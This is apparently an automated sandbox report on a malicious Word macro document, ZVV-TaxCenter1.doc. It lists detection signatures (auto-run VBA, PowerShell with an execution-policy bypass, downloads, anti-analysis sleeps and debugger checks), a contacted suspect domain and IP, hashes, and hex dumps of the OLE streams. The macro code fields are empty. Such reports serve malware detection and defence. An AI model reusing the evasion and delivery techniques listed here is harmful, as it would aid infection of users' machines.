Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 16.0.0 |
Analysis ID: | 167408 |
Start time: | 14:19:09 |
Joe Sandbox Product: | Cloud |
Start date: | 22.09.2016 |
Overall analysis duration: | 0h 4m 44s |
Report type: | full |
Sample file name: | ZVV-TaxCenter1.doc |
Cookbook file name: | defaultwindowsdocumentcookbook.jbs |
Analysis system description: | Windows 7 (Office 2010 v15, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
|
Detection: | MAL |
Classification: | mal76.evad.expl.troj.winDOC@5/16@3/3 |
HCA Information: |
|
EGA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 76 | 0 - 100 | Report FP / FN |
Classification |
---|
Analysis Advice |
---|
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis |
Signature Overview |
---|
Click to jump to signature section
Software Vulnerablities: |
---|
Potential document exploit detected (performs DNS queries) | Show sources |
Source: global traffic | DNS query: |
Potential document exploit detected (performs HTTP gets) | Show sources |
Source: global traffic | TCP traffic: |
Potential document exploit detected (unknown TCP traffic) | Show sources |
Source: global traffic | TCP traffic: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Networking: |
---|
Urls found in memory or binary data | Show sources |
Source: powershell.exe | String found in binary or memory: | ||
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: powershell.exe | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: |
Downloads files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Downloads files from webservers via HTTP | Show sources |
Source: global traffic | HTTP traffic detected: |
Found strings which match to known social media urls | Show sources |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: |
Performs DNS lookups | Show sources |
Source: unknown | DNS traffic detected: |
Tries to download non-existing http data (HTTP/1.1 404 Not Found) | Show sources |
Source: global traffic | HTTP traffic detected: |
Uses HTTPS | Show sources |
Source: unknown | Network traffic detected: | ||
Source: unknown | Network traffic detected: |
HTTP GET or POST without a user agent | Show sources |
Source: global traffic | HTTP traffic detected: |
May check the online IP address of the machine | Show sources |
Source: unknown | DNS query: | ||
Source: unknown | DNS query: |
System Summary: |
---|
Checks whether correct version of .NET is installed | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses Microsoft Silverlight | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: |
Document is a ZIP file with path names indicative for goodware | Show sources |
Source: ZVV-TaxCenter1.doc | Initial sample: |
Checks if Microsoft Office is installed | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Document has a 'vbamacros' value indicative for goodware | Show sources |
Source: ZVV-TaxCenter1.doc | Initial sample: |
Binary contains paths to development resources | Show sources |
Source: WINWORD.EXE | Binary or memory string: |
Classification label | Show sources |
Source: classification engine | Classification label: |
Creates files inside the user directory | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Creates temporary files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Found command line output | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: |
Parts of this applications are using the .NET runtime (Probably coded in C#) | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: |
Reads ini files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: |
Reads software policies | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Runs a DLL by calling functions | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: |
Spawns processes | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: |
Uses an in-process (OLE) Automation server | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Creates mutexes | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: |
Document contains embedded VBA macros | Show sources |
Source: ZVV-TaxCenter1.doc | OLE indicator, VBA macros: |
Document contains no OLE stream with summary information | Show sources |
Source: ZVV-TaxCenter1.doc | OLE indicator has summary info: | ||
Source: ZVV-TaxCenter1.doc | OLE indicator has summary info: |
Document contains summary information with irregular field values | Show sources |
Source: ZVV-TaxCenter1.doc | OLE document summary: | ||
Source: ZVV-TaxCenter1.doc | OLE document summary: | ||
Source: ZVV-TaxCenter1.doc | OLE document summary: | ||
Source: ZVV-TaxCenter1.doc | OLE document summary: | ||
Source: ZVV-TaxCenter1.doc | OLE document summary: | ||
Source: ZVV-TaxCenter1.doc | OLE document summary: |
Document has an unknown application name | Show sources |
Source: ZVV-TaxCenter1.doc | OLE indicator application name: | ||
Source: ZVV-TaxCenter1.doc | OLE indicator application name: |
Document misses a certain OLE stream usually present in this Microsoft Office document type | Show sources |
Source: ZVV-TaxCenter1.doc | OLE stream indicators for Word, Excel, PowerPoint, and Visio: | ||
Source: ZVV-TaxCenter1.doc | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Reads the hosts file | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed | Show sources |
Source: ZVV-TaxCenter1.doc | OLE, VBA macro line: |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: ZVV-TaxCenter1.doc | OLE, VBA macro line: |
Document contains an embedded VBA macro with suspicious strings | Show sources |
Source: ZVV-TaxCenter1.doc | OLE, VBA macro line: | ||
Source: ZVV-TaxCenter1.doc | OLE, VBA macro line: |
Document contains an embedded VBA with functions possibly related to HTTP operations | Show sources |
Source: ZVV-TaxCenter1.doc | Stream path 'VBA/ThisDocument' : |
HIPS / PFW / Operating System Protection Evasion: |
---|
May try to detect the Windows Explorer process (often used for injection) | Show sources |
Source: rundll32.exe | Binary or memory string: | ||
Source: rundll32.exe | Binary or memory string: | ||
Source: rundll32.exe | Binary or memory string: |
Bypasses PowerShell execution policy | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
System process connects to network (likely due to code injection or exploit) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Network Connect: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: |
Anti Debugging: |
---|
Creates guard pages, often used to prevent reverse engineering and debugging | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: |
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: |
Enables debug privileges | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: |
Malware Analysis System Evasion: |
---|
Queries a list of all running processes | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: |
Contains long sleeps (>= 3 min) | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: |
Found a high number of Window / User specific system calls (may be a loop to detect user behavior) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window / User API: |
May sleep (evasive loops) to hinder dynamic analysis | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2160 | Thread sleep time: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messsages (SetErrorMode) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: | ||
Source: C:\Windows\System32\rundll32.exe | Process information set: |
Lowering of HIPS / PFW / Operating System Security Settings: |
---|
AV process strings found (often used to terminate AV products) | Show sources |
Source: powershell.exe | Binary or memory string: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Queries the installation date of Windows | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key value queried: |
Queries the installation date of Windows | Show sources |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: |
Queries the volume information (name, serial number etc) of a device | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: | ||
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|
Contacted Domains/Contacted IPs |
---|
Contacted Domains |
---|
Name | IP | Active |
---|---|---|
www.maxmind.com | 104.16.38.47 | true |
ebusiness-expert.eu | 84.246.227.126 | true |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Country | Flag | ASN | ASN Name |
---|---|---|---|---|
84.246.227.126 | France | 34274 | ELBmultimedia | |
8.8.8.8 | United States | 15169 | GoogleInc | |
104.16.38.47 | United States | 13335 | CloudFlareInc |
Static File Info |
---|
General | |
---|---|
File type: | Microsoft Word 2007+ |
TrID: |
|
File name: | ZVV-TaxCenter1.doc |
File size: | 44812 |
MD5: | 09f16077acf6c05e5c293835b3a75a20 |
SHA1: | a8d3b38ac28178328f787e3956e45a63dd6cdbdd |
SHA256: | ef585e164af62907e9354a7d8991ec31d44737a25458ed143f66cd1e21ab9ebd |
SHA512: | 44c9abc1c2c0909be172bbeca1fe48c863a0909e43577cd8a24a04f2761a024eaeb9094d1511276ea35134d5c447712de3d14981c0b517e3ea5be6db1040d6c3 |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 2 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 26817 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 26817 |
Data ASCII: | . . . . . ' . . . s < . . . . . . . . . . . < . . . < . . . V . . % . . . . . . . H . . 1 . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . q @ H . . . . h . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . X f Q l G . . 6 . . . ? J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . # . G i f t , 0 , 0 , M S I N K A U T L i b , I n k P i c t u r e . . . . X f Q l G . . 6 . . . ? J . . . . . q @ H . . . |
Data Raw: | 01 16 01 00 06 27 01 00 00 73 3c 00 00 0b 01 00 00 af 02 00 00 cd 3c 00 00 e7 3c 00 00 fb 56 00 00 25 00 00 00 01 00 00 00 48 f2 16 31 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 48 00 ff ff 00 00 a2 ac c5 a0 ca 71 40 48 94 0f 15 db 68 a5 1d 1a 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 439 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 439 |
Entropy: | 5.09486815787 |
Base64 Encoded: | True |
Data ASCII: | I D = " { D 4 D 0 8 5 0 D - F D B 9 - 4 8 2 B - B 7 7 C - F F 4 3 6 F 9 2 8 A F D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 A 3 8 1 4 5 C 4 A 6 0 4 A 6 0 4 A 6 0 4 A 6 0 " . . D P B = " 7 4 7 6 5 A 9 E A E D 9 A F D 9 A F D 9 " . . G C = " A E A C 8 0 E 0 8 0 2 0 B B 2 1 B B 2 1 4 4 " . . . . [ H o s t E x t e n d e r I n f |
Data Raw: | 49 44 3d 22 7b 44 34 44 30 38 35 30 44 2d 46 44 42 39 2d 34 38 32 42 2d 42 37 37 43 2d 46 46 34 33 36 46 39 32 38 41 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 41 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 41 |
Entropy: | 3.07738448508 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4086 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4086 |
Entropy: | 4.93054967713 |
Base64 Encoded: | True |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . |
Data Raw: | cc 61 97 00 00 01 00 ff 07 08 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00 |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2349 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2349 |
Entropy: | 4.49001368489 |
Base64 Encoded: | True |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d q . . P @ . . & . 9 . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . 1 . . . . . . . I . . . . . . . a . . . |
Data Raw: | 93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 68 00 00 7f |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 451 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 451 |
Entropy: | 3.80501371853 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . G i f t . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . F r v x s f J . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . N g s G M o s . . . . . . . . r k i p i o e . . . . . . . . R |
Data Raw: | 72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 77 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 11 07 00 00 00 00 00 00 49 08 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 09 b1 02 00 00 00 00 00 00 71 08 00 00 00 00 00 00 18 00 |
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 3144 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 3144 |
Entropy: | 2.08331951533 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . % . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . * . < . . . . . . . . . . . a . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 80 01 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 25 00 25 00 00 00 00 00 01 00 01 00 00 00 02 00 91 07 00 00 00 00 00 00 b9 07 00 00 00 00 00 00 e1 07 00 00 00 00 00 00 ff ff ff ff 69 07 00 00 00 00 00 00 0a 00 2a 00 3c 00 00 00 09 08 00 00 00 00 00 00 61 00 00 00 00 00 01 00 31 08 |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 1881 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 1881 |
Entropy: | 3.16093108335 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L . . . . . 0 . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . ( . 9 . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 ( . y . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 $ . . . . . . . . . . . . ` . . . . . . |
Data Raw: | 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 4c 00 00 00 04 00 30 00 b9 01 00 00 00 00 02 00 00 00 03 60 08 00 e1 06 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 d9 00 00 00 00 00 01 00 11 01 00 00 00 00 01 00 00 00 00 00 1e 08 1d f1 00 00 00 00 00 01 00 24 00 f9 01 00 00 00 00 02 00 01 00 03 |
Stream Path: VBA/dir, File Type: data, Stream Size: 787 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 787 |
Entropy: | 6.37385461279 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . ` . Y . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E O f f i c . E . O . f . . i . c . E . . . . . . . . E 2 D F . 8 D 0 4 C - 5 B . F |
